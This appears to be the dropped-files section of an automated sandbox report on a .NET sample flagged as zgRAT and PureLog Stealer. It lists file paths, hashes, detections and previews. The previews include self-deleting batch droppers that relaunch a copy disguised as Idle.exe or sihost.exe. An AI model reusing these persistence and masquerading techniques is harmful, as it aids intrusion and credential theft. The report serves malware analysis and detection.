Preview:	Cw41Cv7q9CbaOOfV0YaOryUDXlCA8YKeUvvLwVsGtd2myedbFF4yqRqNb1ebt7sk26GccTifqTfO5sO3Hk42eWxCFht51RXwuRt1YA8vhYIWwbStnkTIC0GgJDW5jnoY6teo8WeGmJVFOaQoPASQ7Pu4LNsUoDL4utaD7nuQFNf2eASswspjUXbq9kdvoKci7bUeANrlQBKut1ZK5Ah6XmjXRtDXK8m5u64DqxrjBDSTNr7HKT0nmgLV17MQJTbRZO9w6VdHS85TTQJkw6M1I8TOvjLskbarmA38rKLzzsUol1BlymdNHkJa5uAXKvh0iNrSWK2luXBZopn4hj488MjC1dD6KxpELeFXJtPnt2ctitwQHG0k0j2Vnpa3H6b6s7OJjQu

C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe

Download File

Process:	C:\Users\user\Desktop\F3ePjP272h.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1917440
Entropy (8bit):	7.5372487343021035
Encrypted:	false
SSDEEP:	49152:9KKy7xTKloIHB26GucF5pz4YRl15u9ppVlLV39n:9KT0ewB2IG5prRTWPDLVNn
MD5:	49715A369F3516495CD8016709B367A7
SHA1:	63D60C8A36D6F7BBC8759F7FE141032393051B3C
SHA-256:	1DC5FE5617B6FD067B93358AC4829BE9683085416D80590F09BC646B49EA2B8A
SHA-512:	A7F8E8B4B8637FB7C38A59A010C6C1A5504D498FDD89247A28B504B1505F3EF9C04C8EBA0C5544F989D3EEF44DC46504DCEF69F5455CA83B7754BA82964E1D6F
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 74%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....dg.................:..........^Y... ...`....@.. ....................................@..................................Y..K....`.. ............................................................................ ............... ..H............text...d9... ...:.................. ..`.rsrc... ....`.......<..............@....reloc...............@..............@..B................@Y......H.......4...P................y...X.......................................0..........(.... ........8........E........`...)...M...8....(.... ....~....{....:....& ....8....(.... ....~....{q...:....& ....8....(.... ........8........0.......... ........8........E....k...w..............8f......... ....~....{n...:....& ....8........~....(Y...~....(]... ....?... ....~....{....9....& ....8\|...r...ps....z~....(Q... .... .... ....s....~....(U....... ....~....{....90...& ....8%...~..

C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\F3ePjP272h.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Program Files (x86)\Windows Mail\897f7819a04651

Download File

Process:	C:\Users\user\Desktop\F3ePjP272h.exe
File Type:	ASCII text, with very long lines (408), with no line terminators
Category:	dropped
Size (bytes):	408
Entropy (8bit):	5.849510574362131
Encrypted:	false
SSDEEP:	12:heLFWb3IsN8KXkpmmWVwuWNWY0mnZU14Dd:wpCYsN82kAdoNWnmZU14x
MD5:	EB7A57552252F49EB31D3EB0942F7B48
SHA1:	166FB2EF9C642232F1130A3245A0381654990623
SHA-256:	2A2B55B04202609A8C998330B243E11C9EB4B36DFF5CDB45E8740F4C3DB902A4
SHA-512:	5A670DEBCE5C42A8F5AA4EC79FBFFA21E9452344BD7C2BA4B01792237CD41974E76A834089B9D8A9C622CA5EC53B5D00F43EAA7A7D5EFF6BD5E8119122AEF3AD
Malicious:	false
Preview:	MeiKjhBKqh9W6SiCnjdj9KQGKqIK8bzbXDj6xFpR2kN7Md0ycNm2NsZBNb93Z1MPri83tmOi3LrY7T4rzTsuy6NpnhsVFw2BY8Qnf6Fz8D9BBBE4hSDFIbauUTQL33cHTq98CRL2O2vv7Mnldyywsx26ifTMq46Fl2sVBF1PHL0QppwIporFEqYfxCag78MU5qKFdRjX6iph6mR3tKgBM1B4dMi9pVRI8gU9fqoYETIfA0jLvhxxcKHEpPmQtkskQgiZRRYCfI72sf3nnWNHheqyZPUPEYpekhPeRJ3eJvRTNOVJV8nWXkDvzuAB7I7HdcRKQZWdct8wNWlK4K4GuSHAedohI1gBxJ0u6K35mJ4nmQicI0HwN1XKVRqxuyVkM79Ef1NtR9dkXdXO4LYSuux6

C:\Program Files (x86)\Windows Mail\jmfWpjtPWHWFodUifDHiQtgxi.exe

Download File

Process:	C:\Users\user\Desktop\F3ePjP272h.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1917440
Entropy (8bit):	7.5372487343021035
Encrypted:	false
SSDEEP:	49152:9KKy7xTKloIHB26GucF5pz4YRl15u9ppVlLV39n:9KT0ewB2IG5prRTWPDLVNn
MD5:	49715A369F3516495CD8016709B367A7
SHA1:	63D60C8A36D6F7BBC8759F7FE141032393051B3C
SHA-256:	1DC5FE5617B6FD067B93358AC4829BE9683085416D80590F09BC646B49EA2B8A
SHA-512:	A7F8E8B4B8637FB7C38A59A010C6C1A5504D498FDD89247A28B504B1505F3EF9C04C8EBA0C5544F989D3EEF44DC46504DCEF69F5455CA83B7754BA82964E1D6F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 74%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....dg.................:..........^Y... ...`....@.. ....................................@..................................Y..K....`.. ............................................................................ ............... ..H............text...d9... ...:.................. ..`.rsrc... ....`.......<..............@....reloc...............@..............@..B................@Y......H.......4...P................y...X.......................................0..........(.... ........8........E........`...)...M...8....(.... ....~....{....:....& ....8....(.... ....~....{q...:....& ....8....(.... ........8........0.......... ........8........E....k...w..............8f......... ....~....{n...:....& ....8........~....(Y...~....(]... ....?... ....~....{....9....& ....8\|...r...ps....z~....(Q... .... .... ....s....~....(U....... ....~....{....90...& ....8%...~..

C:\Program Files (x86)\Windows Mail\jmfWpjtPWHWFodUifDHiQtgxi.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\F3ePjP272h.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Program Files\MSBuild\Microsoft\897f7819a04651

Download File

Process:	C:\Users\user\Desktop\F3ePjP272h.exe
File Type:	ASCII text, with very long lines (953), with no line terminators
Category:	dropped
Size (bytes):	953
Entropy (8bit):	5.911212694259714
Encrypted:	false
SSDEEP:	24:/khAkRwzLMRLDBacx7kWQyXGiMxAVk2maQAs7Y:/6nRwzARVxRQSGikOkqQvY
MD5:	291FE77A9B658035A9E2597C80E3F90B
SHA1:	1902E5A923423EA0DAD223580F1D2D3B607D1B72
SHA-256:	24424D00BACA916468A38117C426F496AA8256F7AEB35F1C3EC6FBA6EBCE903B
SHA-512:	F28F4E999E60B810525AB0D41FE9D09BCEC0A89331D7688CA18F90A43599A16E1774218BB72D664062F6E55A955BF3DC081412550F8D0A840D9796A7F61B61AF
Malicious:	false
Preview:	xBIVS8NZ2l23RV4QvTxPsB8KPX450xcZRxqo7RSXmJ3dRAYegTUHlMOvD7G4DRjEJdmdoQTeAanjIf2O9ZYhdUxFj5l9LXTUjyTyY40Q9zHLionhE15o2Clzqg4soUTnGS9UME0EiIhnNlg4SE5TbochMeH1AHmpgeFPoTU9B1Gue8mF99akZALb0cHs78Daf2HtgRP9t5SjirDN2C1ArCQgSnYMLmCCxpOm12istb0drl2JZ404HDtdlla22DxH2Qv3daW9dIQPMwyquPxQwH4u6vAQcq0qnslbz9q8h0b8wdRzwuImQgVuVB7raFhxSkldLW0vjyt5q68cdLdrhNZGX0GyC8ibTnpL1xoa3WDcxZDYCeOPmzPEKeFUPBtkPRlDQwkphDyLK7T7wsvhuTzeXlBXrTK1ncMgyAIQ4irjBE4NLIihQL06bHppvN7N26hrvwJwjfnLlQcTqxLjvmlclPEqUcfqkeqFhNbZ8v7vioULoW97CYcPUFFfrcbH96lHkXvdVwk9p03753B8dioMBavbH6rgU0vmDNlRkflPxdkdLIkxacnbRZFJmTWZEEpyFR3rSuY76ZYizRQ8W3F1MTUnHboQJMLtywY4O2epEqf2AhTVDXDK9xlv6Qk1GIxuNptD2WtdYZxgycmjHTMvJAtAKn78Snj62uoVxPcrojvkAF6dnAtx5CkN5t3PYuLvz0oDyRv21eHjOJAFqeVR4wB0KbaEWMT4YAuJa2pWO15a4B8vsyi3Y30Dzy3W0qfoLMLNZ0oyy9CD0k5JcoWinZfeJqUm8SfiVQPszuV1JuFZ0xMO3u3MU7BvrrDsgCzfderjVNTrSeY3UFnWeFtNZSNXPdAIrnVH4j5WFm3qbM30iHblDrObSlGKRTU2MLApJR9vJRQ1LDwMZXyICYE9Z3yScuEvSBdPLOqRIqcwbWPPz3v3eL0xH

C:\Program Files\MSBuild\Microsoft\jmfWpjtPWHWFodUifDHiQtgxi.exe

Download File

Process:	C:\Users\user\Desktop\F3ePjP272h.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1917440
Entropy (8bit):	7.5372487343021035
Encrypted:	false
SSDEEP:	49152:9KKy7xTKloIHB26GucF5pz4YRl15u9ppVlLV39n:9KT0ewB2IG5prRTWPDLVNn
MD5:	49715A369F3516495CD8016709B367A7
SHA1:	63D60C8A36D6F7BBC8759F7FE141032393051B3C
SHA-256:	1DC5FE5617B6FD067B93358AC4829BE9683085416D80590F09BC646B49EA2B8A
SHA-512:	A7F8E8B4B8637FB7C38A59A010C6C1A5504D498FDD89247A28B504B1505F3EF9C04C8EBA0C5544F989D3EEF44DC46504DCEF69F5455CA83B7754BA82964E1D6F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 74%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....dg.................:..........^Y... ...`....@.. ....................................@..................................Y..K....`.. ............................................................................ ............... ..H............text...d9... ...:.................. ..`.rsrc... ....`.......<..............@....reloc...............@..............@..B................@Y......H.......4...P................y...X.......................................0..........(.... ........8........E........`...)...M...8....(.... ....~....{....:....& ....8....(.... ....~....{q...:....& ....8....(.... ........8........0.......... ........8........E....k...w..............8f......... ....~....{n...:....& ....8........~....(Y...~....(]... ....?... ....~....{....9....& ....8\|...r...ps....z~....(Q... .... .... ....s....~....(U....... ....~....{....90...& ....8%...~..

C:\Program Files\MSBuild\Microsoft\jmfWpjtPWHWFodUifDHiQtgxi.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\F3ePjP272h.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\66fc9ff0ee96c2

Download File

Process:	C:\Users\user\Desktop\F3ePjP272h.exe
File Type:	ASCII text, with very long lines (796), with no line terminators
Category:	dropped
Size (bytes):	796
Entropy (8bit):	5.906380728911261
Encrypted:	false
SSDEEP:	24:4tQjmFqWhEIXTiFv2yAXZzrWupdW9trG0:4tQjmUWyv2nzrWupdW9tp
MD5:	8C5E5703FF04CEA49DEBCC2CA791F193
SHA1:	623383B7D23CB8DCAB68CED3204F292A2613D8D6
SHA-256:	4113D4DA6C3479C2C7CDC3C5545253B38B59EE5BCE19C5944026DC265C44EC5A
SHA-512:	1AD6D71157A175B573AB08FF121E48F21671350B6CCB9A18C6896376A19694CC5F540B2D6A6A8B31AD76FB735F3994B9EB782D25DC39ABBB07B3914A5C7310C1
Malicious:	false
Preview:	zE7EOmluteSWfxafBlemq1VCPiUwlxMSMUGX9nsmizgQf8vbpOy1nEG7t5zpRyI5R9KLqDgX22D0VEgRw3HX9UoHNJnDyDUtrk8fykulsa8vAPmoYi2Xrv67VC8hZcjzhUJuFAdMIfpiV3H7g9oQL6C6oBKvmNLP1JNqG2iXEpPLFYlc5AAaxTnkRNGD0rk5UZrLpa1oaQLfr00Qas0lNvbhfnY2vehXFT0qqZxeIV9gHI2bX0nI18rj8JqBC935txaY9JjB5Vd1v4ZXu7f51ZgGlRshtvcJcExUsebNRmNff0yDtSREe7EURUwsbBRJ2TZqHFpPgRoOLAkvdoyadXpeAdCYssvPUDmMaH6nnBiMTzIQtAOwN1pfo4qnDRhxfY4IYYUVsKxczcLKUvore8BdXHifaSkWdvq4592Vp2EDENpLtfSRmzTgWavQ0y5akb8DvQPV3TBl48ZJbWw49StocJheOmf07ncnOmZdQ7YTxsmYBlzdCAaRrUllsvHRyLnQgw5z6SoB4Z0uhJdmwBy7ML54Axve0HfmEV2Oq9gtVZXRd1EiSeewXpEU1AyIhKLw4NpMRO6xeElxxnaItMMWnsPYRhXpKXMLOlXQM2REirSTEQhNkqZV8yJM8Q4u0QmG1ajMQK604Hx6Z6UA9KFe80NZbKR57hOREMbnrV7Ztia0AMwB63upKHIBNKuF2B3X3g1NfrToMqvZaWYOYP9DwiH7EaZhk1grpC6eVjgOjFdeWsk0vfrmBzlVY4JERwDVJDuXa33ytueqFmlVzivFK4p0

C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe

Download File

Process:	C:\Users\user\Desktop\F3ePjP272h.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1917440
Entropy (8bit):	7.5372487343021035
Encrypted:	false
SSDEEP:	49152:9KKy7xTKloIHB26GucF5pz4YRl15u9ppVlLV39n:9KT0ewB2IG5prRTWPDLVNn
MD5:	49715A369F3516495CD8016709B367A7
SHA1:	63D60C8A36D6F7BBC8759F7FE141032393051B3C
SHA-256:	1DC5FE5617B6FD067B93358AC4829BE9683085416D80590F09BC646B49EA2B8A
SHA-512:	A7F8E8B4B8637FB7C38A59A010C6C1A5504D498FDD89247A28B504B1505F3EF9C04C8EBA0C5544F989D3EEF44DC46504DCEF69F5455CA83B7754BA82964E1D6F
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 74%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....dg.................:..........^Y... ...`....@.. ....................................@..................................Y..K....`.. ............................................................................ ............... ..H............text...d9... ...:.................. ..`.rsrc... ....`.......<..............@....reloc...............@..............@..B................@Y......H.......4...P................y...X.......................................0..........(.... ........8........E........`...)...M...8....(.... ....~....{....:....& ....8....(.... ....~....{q...:....& ....8....(.... ........8........0.......... ........8........E....k...w..............8f......... ....~....{n...:....& ....8........~....(Y...~....(]... ....?... ....~....{....9....& ....8\|...r...ps....z~....(Q... .... .... ....s....~....(U....... ....~....{....90...& ....8%...~..

C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\F3ePjP272h.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\F3ePjP272h.exe.log

Download File

Process:	C:\Users\user\Desktop\F3ePjP272h.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1396
Entropy (8bit):	5.350961817021757
Encrypted:	false
SSDEEP:	24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKu
MD5:	EBB3E33FCCEC5303477CB59FA0916A28
SHA1:	BBF597668E3DB4721CA7B1E1FE3BA66E4D89CD89
SHA-256:	DF0C7154CD75ADDA09758C06F758D47F20921F0EB302310849175D3A7346561F
SHA-512:	663994B1F78D05972276CD30A28FE61B33902D71BF1DFE4A58EA8EEE753FBDE393213B5BA0C608B9064932F0360621AF4B4190976BE8C00824A6EA0D76334571
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Idle.exe.log

Download File

Process:	C:\Windows\Speech\Engines\SR\Idle.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1613
Entropy (8bit):	5.370675888495854
Encrypted:	false
SSDEEP:	48:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKlT4v1qHGIs0HKD:iqbYqGSI6oPtzHeqKktGqZ4vwmj0qD
MD5:	5ACBB013936118762389287938AE0885
SHA1:	12C6B0AA2B5238E3154F3B538124EE9DB0E496D6
SHA-256:	28E292538199310B7DA27C6C743EFD34E1F806D28611B6C9EF4212D132272DEF
SHA-512:	E803C699BE7FC25FF09D1DEE86412CE8F18834E22E20B7D036323B740891A64B2CE33D0E0BD075178F0B6F496BA9CFBF7EF1A0884FE5E470C8CCF6D824891C77
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\jmfWpjtPWHWFodUifDHiQtgxi.exe.log

Download File

Process:	C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	847
Entropy (8bit):	5.354334472896228
Encrypted:	false
SSDEEP:	24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
MD5:	9F9FA9EFE67E9BBD165432FA39813EEA
SHA1:	6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
SHA-256:	4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
SHA-512:	F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\sihost.exe.log

Download File

Process:	C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	847
Entropy (8bit):	5.354334472896228
Encrypted:	false
SSDEEP:	24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
MD5:	9F9FA9EFE67E9BBD165432FA39813EEA
SHA1:	6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
SHA-256:	4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
SHA-512:	F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

C:\Users\user\AppData\Local\Temp\PZgPBjPvse

Download File

Process:	C:\Windows\Speech\Engines\SR\Idle.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.403856189774723
Encrypted:	false
SSDEEP:	3:kxeEsKLVfH0n:kxeEHVcn
MD5:	1A25366576416877B5479982A9F8B014
SHA1:	05FD3D38AD1F2380AE531132843E412DA4B0EB01
SHA-256:	3B5A9D0E48AC34CD90A3F03EFCA38A2A739A788F99D66883D25D2E513F41B016
SHA-512:	7127F3A1F62BA76B816BB2C4C72EAF0E1F10DCD605AA4A377E79FC675DD20DFA2C2488642431C429092F1AEE02FA86146B7EB3DA06C77F5E0430A0806F6733CE
Malicious:	false
Preview:	D6R6VF24ITzD5ay8hSfnpzZjQ

C:\Users\user\AppData\Local\Temp\diPKyqwECs.bat

Download File

Process:	C:\Users\user\Desktop\F3ePjP272h.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	166
Entropy (8bit):	5.1479151623681325
Encrypted:	false
SSDEEP:	3:mKDDVNGvTVLuVFcROr+jn9mVA7Mvo3SJA0BvBktKcKZG1Ukh4E2J5xAIj0H:hCRLuVFOOr+DEGIvoiJpvKOZG1923fj+
MD5:	203DFD5EE84F04963919D171432CE61F
SHA1:	1753055F806E451EA0F3BA2EB51DD3D083ECD469
SHA-256:	57D241218FB7EE8777300567048E7DB249B5B2F4129A9871FCBCC315963DB8F1
SHA-512:	E932E22AC521A3EF8A1F13910526AC0BF17570595FC276007C1A367C6CDFF8F0D383871B953AD40883A5AD25DBC0DA4C46A0EF9E5DF8EED768A42A411B1DC3AA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Windows\Speech\Engines\SR\Idle.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\diPKyqwECs.bat"

C:\Users\user\AppData\Local\Temp\euqVpFfbpH.bat

Download File

Process:	C:\Windows\Speech\Engines\SR\Idle.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	214
Entropy (8bit):	5.1250692390285035
Encrypted:	false
SSDEEP:	6:hCijTg3Nou1SV+DEGIvoiJpvKOZG1923f2Hm:HTg9uYDEjoiJz+G
MD5:	B6477659358F945F81571DB517062BC2
SHA1:	64EF2ABD6E039B78FF7E5F9544D1AF7B355E4785
SHA-256:	7DEC96312165D017C495844FF0F3E640DC904D7518B0159265F7F55677ACCD4A
SHA-512:	95BBEC75FF22DC12338EB9A90D382E61374C57E60A912E50BB592B0129C42387C384853CB55759828DC18C56158AF329999A460616A8F3B8902C265B47BF2B3D
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Windows\Speech\Engines\SR\Idle.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\euqVpFfbpH.bat"

C:\Users\user\AppData\Local\Temp\pYpeGKxyTa

Download File

Process:	C:\Users\user\Desktop\F3ePjP272h.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.403856189774723
